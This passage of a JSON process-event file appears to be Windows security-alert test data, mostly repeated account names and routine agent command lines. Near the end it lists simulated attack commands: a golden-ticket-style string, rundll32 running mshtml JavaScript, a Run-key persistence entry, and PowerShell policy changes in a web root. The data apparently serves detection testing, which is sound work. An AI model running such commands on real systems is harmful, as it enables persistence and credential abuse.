STICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd  /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32  /C 42424.exe\",\"42424.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32  /C 1234.exe\",\"1234.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32  /C reg.exe\",\"reg.exe\",\".\\\\reg.exe  add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe  C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe  \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo 